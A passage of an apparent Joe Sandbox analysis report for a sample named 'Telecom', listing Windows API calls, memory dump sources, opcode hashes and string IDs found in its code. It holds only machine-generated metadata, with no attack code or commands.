                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 004D61E4
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 004D623C
                                                      • _wcslen.LIBCMT ref: 004D624E
                                                      • _wcslen.LIBCMT ref: 004D6259
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 004D62B5
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen
                                                      • String ID:
                                                      • API String ID: 763830540-0
                                                      • Opcode ID: 4e3daa5b9910c8b79368502e307c6f72845637e43cdfcc8a6af99b5130533a8f
                                                      • Instruction ID: 204f635a0dea1847145479c76095eb158c7aa495e8a452ddb3c021f28e596a63
                                                      • Opcode Fuzzy Hash: 4e3daa5b9910c8b79368502e307c6f72845637e43cdfcc8a6af99b5130533a8f
                                                      • Instruction Fuzzy Hash: C1218571900218AADF10DF54CC84AEE77B8FF55314F10425BF925EA381D7789985CF55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 004C13AE
                                                      • GetForegroundWindow.USER32 ref: 004C13C5
                                                      • GetDC.USER32(00000000), ref: 004C1401
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 004C140D
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 004C1445
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: a2fcfe0b518f23d5b1e220210dc6a432e0c3769f9f059c9a7aa1770eb2e35fd4
                                                      • Instruction ID: 42a77e1fda4d94f880a5740f657d637e735e354e8d5bac7dd6120242c4d148a2
                                                      • Opcode Fuzzy Hash: a2fcfe0b518f23d5b1e220210dc6a432e0c3769f9f059c9a7aa1770eb2e35fd4
                                                      • Instruction Fuzzy Hash: 13218135A01204AFD744EF66CC94E9EBBF5EF49304B04847EE85A97761CA74EC00CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0047D146
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047D169
                                                        • Part of subcall function 00473B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00466A79,?,0000015D,?,?,?,?,004685B0,000000FF,00000000,?,?), ref: 00473BC5
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0047D18F
                                                      • _free.LIBCMT ref: 0047D1A2
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0047D1B1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: 688ba978c874135e8e5c36015c6671887aa4954198340fd7eea7a897c1297745
                                                      • Instruction ID: 216d026092d9d18eec0685507cebeba2488655f40cb4a17ad82d8a261bcd8675
                                                      • Opcode Fuzzy Hash: 688ba978c874135e8e5c36015c6671887aa4954198340fd7eea7a897c1297745
                                                      • Instruction Fuzzy Hash: C601B172E126157F23212A7A5C88CBB6B7DDEC2B61354822BBC08C2244DA688C0281B9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetLastError.KERNEL32(0000000A,?,?,0046F64E,0046545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00473170
                                                      • _free.LIBCMT ref: 004731A5
                                                      • _free.LIBCMT ref: 004731CC
                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 004731D9
                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 004731E2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: c26327496d50573e5507c62482ddf8c8bccf199a0f11d790d6455d5dbb3778e7
                                                      • Instruction ID: d88e88351cecf3d32936d21e80f6b5aaa1ffff9f4ea77e876bf9ce4e5dc41448
                                                      • Opcode Fuzzy Hash: c26327496d50573e5507c62482ddf8c8bccf199a0f11d790d6455d5dbb3778e7
                                                      • Instruction Fuzzy Hash: 070149726816007BD7222E359C85EEB2768EBC0377760842FF81C92281EE6D8A02712D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?,?,004A0C4E), ref: 004A091B
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?), ref: 004A0936
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?), ref: 004A0944
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?), ref: 004A0954
                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?), ref: 004A0960
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: c8ecad4a8e2cb275643c2d45e04cb18570a34a7c294badd25f30e943d2ebc89e
                                                      • Instruction ID: 64a706823b5ab6468b18424bc140bbea556763f260ec84a5ce6f248c2c88f500
                                                      • Opcode Fuzzy Hash: c8ecad4a8e2cb275643c2d45e04cb18570a34a7c294badd25f30e943d2ebc89e
                                                      • Instruction Fuzzy Hash: BC01FDB2A01204BFEB015F54CC04B9B7FBDEF88792F100026F905E2212E774DD00ABA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004AF2AE
                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 004AF2BC
                                                      • Sleep.KERNEL32(00000000), ref: 004AF2C4
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004AF2CE
                                                      • Sleep.KERNEL32 ref: 004AF30A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: ecdde332dfdebd6b73433f54d98584a8a3d01495f649c897a50c6c96b80e46b7
                                                      • Instruction ID: 43c0487f0fcd40e055d79d4c8b741c045ae2da2fde767def7613f0bc28ec186c
                                                      • Opcode Fuzzy Hash: ecdde332dfdebd6b73433f54d98584a8a3d01495f649c897a50c6c96b80e46b7
                                                      • Instruction Fuzzy Hash: 4B016D71C02519EBDF00AFE4DD49AEEBB78FF1A700F010467D902B2250DB349558C7A9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0CCB
                                                      • CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0CD8
                                                      • CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0CE5
                                                      • CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0CF2
                                                      • CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0CFF
                                                      • CloseHandle.KERNEL32(?,?,?,?,004B0B24,?,004B3D41,?,00000001,00483AF4,?), ref: 004B0D0C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: 963ea111f20d26849d0ec2da498a678271ce7e73ec36a482884c26d05ef6cfd4
                                                      • Instruction ID: 7f2cd332a41419585fa7c64b654620e9ff0301e03c2ba265b729ba1215a7b2f3
                                                      • Opcode Fuzzy Hash: 963ea111f20d26849d0ec2da498a678271ce7e73ec36a482884c26d05ef6cfd4
                                                      • Instruction Fuzzy Hash: 7301DC71800B05CFCB30AFA6D880857FBF9BE502163108A3FD09652A31C7B0A848DE94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 004A65BF
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 004A65D6
                                                      • MessageBeep.USER32(00000000), ref: 004A65EE
                                                      • KillTimer.USER32(?,0000040A), ref: 004A660A
                                                      • EndDialog.USER32(?,00000001), ref: 004A6624
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 744c90d8d083de8f4d6568aeaad268c6235e870d4d55333aeb7dc9019b9c49b4
                                                      • Instruction ID: 1ed3daa2e21214d6c4cb0d4e8b86d6deb81e96349bf982a125b7e770d1491f05
                                                      • Opcode Fuzzy Hash: 744c90d8d083de8f4d6568aeaad268c6235e870d4d55333aeb7dc9019b9c49b4
                                                      • Instruction Fuzzy Hash: 75018130D41304ABEB205F20DD4EB967BB8FF15705F05066FA186A10E1DBF8AA448A99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _free.LIBCMT ref: 0047262E
                                                        • Part of subcall function 00472D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0047DB51,00511DC4,00000000,00511DC4,00000000,?,0047DB78,00511DC4,00000007,00511DC4,?,0047DF75,00511DC4), ref: 00472D4E
                                                        • Part of subcall function 00472D38: GetLastError.KERNEL32(00511DC4,?,0047DB51,00511DC4,00000000,00511DC4,00000000,?,0047DB78,00511DC4,00000007,00511DC4,?,0047DF75,00511DC4,00511DC4), ref: 00472D60
                                                      • _free.LIBCMT ref: 00472640
                                                      • _free.LIBCMT ref: 00472653
                                                      • _free.LIBCMT ref: 00472664
                                                      • _free.LIBCMT ref: 00472675
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 8a3b82d3982e71f230b2921ef820c504326d02ad999652f3800838179a5493ee
                                                      • Instruction ID: 90709a9db929e749a55c25f8e617ab8a29fe25711724c7418d262c2924be719f
                                                      • Opcode Fuzzy Hash: 8a3b82d3982e71f230b2921ef820c504326d02ad999652f3800838179a5493ee
                                                      • Instruction Fuzzy Hash: 76F03A74802520CBC712AF95ED018CE3BA4BB34754701D94BF42892276C7BD095ABFAC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: __freea$_free
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3432400110-3206640213
                                                      • Opcode ID: 40d4121d6a0851d50a6b13ae811411a5d6154d97297b79b9764b571a1852f237
                                                      • Instruction ID: 6359b29ab1899e70f07c433dd213cc0643cf037abe338ead6fc9e8b754c31007
                                                      • Opcode Fuzzy Hash: 40d4121d6a0851d50a6b13ae811411a5d6154d97297b79b9764b571a1852f237
                                                      • Instruction Fuzzy Hash: 6AD1D3759102069BDB289FACC8956FBB7B1FF05700F28815BE90A9B370D23D9D41CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004B41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004C52EE,?,?,00000035,?), ref: 004B4229
                                                        • Part of subcall function 004B41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004C52EE,?,?,00000035,?), ref: 004B4239
                                                      • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 004C5419
                                                      • VariantInit.OLEAUT32(?), ref: 004C550E
                                                      • VariantClear.OLEAUT32(?), ref: 004C55CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                      • String ID: bnJ
                                                      • API String ID: 2854431205-3647285499
                                                      • Opcode ID: dbddf68dd46aad359d230f5c5d6492f87bf7820eb2f89d6eb6589127920407b8
                                                      • Instruction ID: 54db4de94b094e1a8bf91e7183c30134d73b7be36a97a17b1d2e540a30f0f6ed
                                                      • Opcode Fuzzy Hash: dbddf68dd46aad359d230f5c5d6492f87bf7820eb2f89d6eb6589127920407b8
                                                      • Instruction Fuzzy Hash: CBD15C749002499FDB44DF95C890FEEBBB4FF18308F54805EE406AB292DB39A986CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0044D253
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: t5Q$t5Q$t5Q
                                                      • API String ID: 1385522511-950353684
                                                      • Opcode ID: 2a528e8a1b3bc7f78d8ad21ddced09b8f233816a2e234c99401e8f38552b6595
                                                      • Instruction ID: 9a112eb753d64cf26868fdbb47d0920da20524cda1f98526b8954336ba7b7e23
                                                      • Opcode Fuzzy Hash: 2a528e8a1b3bc7f78d8ad21ddced09b8f233816a2e234c99401e8f38552b6595
                                                      • Instruction Fuzzy Hash: 32914875E00206CFDB14CF59C4906AABBF2FF59304F24816AD945AB340E739EA82CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper_wcslen
                                                      • String ID: CALLARGARRAY$bnJ
                                                      • API String ID: 157775604-2983707253
                                                      • Opcode ID: 94c068d4b38ae4778083f7644e1a71830aac06683dcd7fbae8f4794e319f2d7c
                                                      • Instruction ID: 242e29474204f01558bfc27e24b46cd2cb0c4535c47660e7336aa7502d99ed93
                                                      • Opcode Fuzzy Hash: 94c068d4b38ae4778083f7644e1a71830aac06683dcd7fbae8f4794e319f2d7c
                                                      • Instruction Fuzzy Hash: 3041A075E001059BCB00EFA5C881EAEBBB5FF59314F15806FE406A7391D7799941CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004ABDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004A2B1D,?,?,00000034,00000800,?,00000034), ref: 004ABDF4
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004A30AD
                                                        • Part of subcall function 004ABD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004A2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 004ABDBF
                                                        • Part of subcall function 004ABCF1: GetWindowThreadProcessId.USER32(?,?), ref: 004ABD1C
                                                        • Part of subcall function 004ABCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004A2AE1,00000034,?,?,00001004,00000000,00000000), ref: 004ABD2C
                                                        • Part of subcall function 004ABCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004A2AE1,00000034,?,?,00001004,00000000,00000000), ref: 004ABD42
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004A311A
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004A3167
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: a022baa53e94f85cfe722821269ed0ac12f56515726996fe7b5510603b3ac851
                                                      • Instruction ID: 18f417dde33fb556cdddfe345a9e35c7ee15a5edf698ea79b4f264af8b021ace
                                                      • Opcode Fuzzy Hash: a022baa53e94f85cfe722821269ed0ac12f56515726996fe7b5510603b3ac851
                                                      • Instruction Fuzzy Hash: C4412D72900218BFDB11DFA5CD81ADEB7B8EF56704F00409AF945B7181DA746F45CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004ACBB1
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 004ACBF7
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005129C0,01495B28), ref: 004ACC40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem
                                                      • String ID: 0
                                                      • API String ID: 135850232-4108050209
                                                      • Opcode ID: 7dacb80064f93d34bd64978f30012033789e7248890c93ceb806ddfed4e7fda9
                                                      • Instruction ID: b6a860f0a908719e252c2d2b5557fa37c09b27dc7227b1141d884ec1f13fd080
                                                      • Opcode Fuzzy Hash: 7dacb80064f93d34bd64978f30012033789e7248890c93ceb806ddfed4e7fda9
                                                      • Instruction Fuzzy Hash: 0941C0712043029FD720DF29D8C4B5BBBE8AF96724F04461EF4A597391D738E904CB6A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,004DDCD0,00000000,?,?,?,?), ref: 004D4F48
                                                      • GetWindowLongW.USER32 ref: 004D4F65
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004D4F75
                                                      Strings
                                                      Memory Dump Source
